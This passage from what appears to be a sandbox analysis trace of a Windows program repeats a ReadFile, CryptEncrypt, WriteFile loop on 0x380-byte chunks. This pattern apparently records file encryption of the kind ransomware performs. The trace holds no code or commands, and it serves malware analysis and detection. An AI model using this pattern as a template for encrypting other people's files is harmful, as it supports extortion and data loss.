lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.769] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.770] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.771] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.772] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.772] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.772] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.772] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.772] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.772] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.773] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.774] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.774] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.774] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 